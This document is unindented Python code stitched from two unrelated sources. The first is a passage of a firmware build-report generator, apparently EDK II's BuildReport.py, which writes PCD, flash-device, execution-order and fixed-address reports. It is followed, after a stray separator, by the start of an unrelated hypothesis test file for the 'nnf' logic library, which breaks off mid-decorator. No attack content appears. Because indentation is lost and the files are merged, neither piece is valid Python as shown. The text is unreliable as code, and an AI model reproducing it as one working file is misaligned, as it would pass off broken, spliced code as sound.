OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for Key, Values in OverrideStruct.items():
if Values[1] and Values[1].endswith('.dsc'):
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
if int(str(Module.AutoGenVersion), 0) >= 0x00010005:
RealEntryPoint = "_ModuleEntryPoint"
else:
RealEntryPoint = EntryPoint
if EntryPoint == "_ModuleEntryPoint":
CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "")
Match = gGlueLibEntryPoint.search(CCFlags)
if Match:
EntryPoint = Match.group(1)
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = open(SourceList, "w+")
for Item in self._SourceList:
FileWrite(TempFile, Item)
TempFile.close()
TempFile = open(GuidList, "w+")
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
TempFile.close()
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = BytesIO('')
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, True)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
test_nnf.py | import copy
import pathlib
import pickle
import platform
import shutil
import threading
import types
import typing as t
import pytest
from hypothesis import (assume, event, given, strategies as st, settings,
HealthCheck)
import nnf
from nnf import (Var, And, Or, amc, dimacs, dsharp, operators,
tseitin, complete_models, config, pysat, all_models)
memoized = [
method
for method in vars(nnf.NNF).values()
if isinstance(method, types.FunctionType) and hasattr(method, "memo")
]
assert memoized, "No memoized methods found, did the implementation change?"
for method in memoized:
method.set = lambda *args: None # type: ignore
settings.register_profile('patient', deadline=2000,
suppress_health_check=(HealthCheck.too_slow,))
settings.load_profile('patient')
a, b, c = Var('a'), Var('b'), Var('c')
fig1a = (~a & b) | (a & ~b)
fig1b = (~a | ~b) & (a | b)
satlib = pathlib.Path(__file__).parent / "testdata" / "satlib"
uf20 = [dsharp.load(file.open()) for file in (satlib / "uf20").glob("*.nnf")]
uf20_cnf = [
dimacs.load(file.open()) for file in (satlib / "uf20").glob("*.cnf")
] # type: t.List[And[Or[Var]]]
# Test config default value before the tests start mucking with the state
assert config.sat_backend == "auto"
def test_all_models_basic():
assert list(nnf.all_models([])) == [{}]
assert list(nnf.all_models([1])) == [{1: False}, {1: True}]
assert len(list(nnf.all_models(range(10)))) == 1024
@given(st.sets(st.integers(), max_size=8))
def test_all_models(names):
result = list(nnf.all_models(names))
# Proper result size
assert len(result) == 2**len(names)
# Only real names, only booleans
assert all(name in names and isinstance(value, bool)
for model in result
for name, value in model.items())
# Only complete models
assert all(len(model) == len(names)
for model in result)
# No duplicate models
assert len({tuple(model.items()) for model in result}) == len(result)
def test_basic():
assert a.satisfied_by(dict(a=True))
assert (a | b).satisfied_by(dict(a=False, b=True))
assert not (a & b).satisfied_by(dict(a=True, b=False))
assert (a & b).satisfiable()
assert not (a & ~a).satisfiable()
assert not (a & (~a & b)).satisfiable()
assert ((a | b) & (b | c)).satisfiable()
def test_amc():
assert amc.NUM_SAT(fig1a) == 2
assert amc.NUM_SAT(fig1b) == 4
assert amc.GRAD(a, {'a': 0.5}, 'a') == (0.5, 1)
names = st.integers(1, 8)
@st.composite
def variables(draw):
return Var(draw(names), draw(st.booleans()))
@st.composite
def booleans(draw):
return draw(st.sampled_from((nnf.true, nnf.false)))
@st.composite
def leaves(draw):
return draw(st.one_of(variables(), booleans()))
@st.composite
def terms(draw):
return And(Var(name, draw(st.booleans()))
for name in draw(st.sets(names)))
@st.composite
def clauses(draw):
return Or(Var(name, draw(st.booleans()))
for name in draw(st.sets(names)))
@st.composite
def DNF(draw):
return Or(draw(st.frozensets(terms())))
@st.composite
def CNF(draw):
sentence = And(draw(st.frozensets(clauses())))
return sentence
@st.composite
def models(draw):
return And(
Var(name, draw(st.booleans()))
for name in range(1, draw(st.integers(min_value=1, max_value=9)))
)
@st.composite
def MODS(draw):
num = draw(st.integers(min_value=1, max_value=9))
amount = draw(st.integers(min_value=0, max_value=10))
return Or(And(Var(name, draw(st.booleans()))
for name in range(1, num))
for _ in range(amount))
@st.composite
def internal(draw, children):
return draw(st.sampled_from((And, Or)))(draw(st.frozensets(children)))
@st.composite
def NNF(draw):
return draw(st.recursive(variables(), internal))
@st.composite
def DNNF(draw):
sentence = draw(NNF())
assume(sentence.decomposable())
return sentence
@given(DNF())
def test_hyp(sentence: nnf.Or):
assume(len(sentence.children) != 0)
assume(sentence.decomposable())
assert sentence.satisfiable()
assert sentence.vars() <= set(range(1, 9))
@given(MODS())
def test_MODS(sentence: nnf.Or):
assert sentence.smooth()
assert sentence.flat()
assert sentence.decomposable()
assert sentence.simply_conjunct()
@given(MODS())
def test_MODS_satisfiable(sentence: nnf.Or):
if len(sentence.children) > 0:
assert sentence.satisfiable()
else:
assert not sentence.satisfiable()
@pytest.fixture(scope='module', params=[True, False])
def merge_nodes(request):
return request.param
@given(sentence=DNNF())
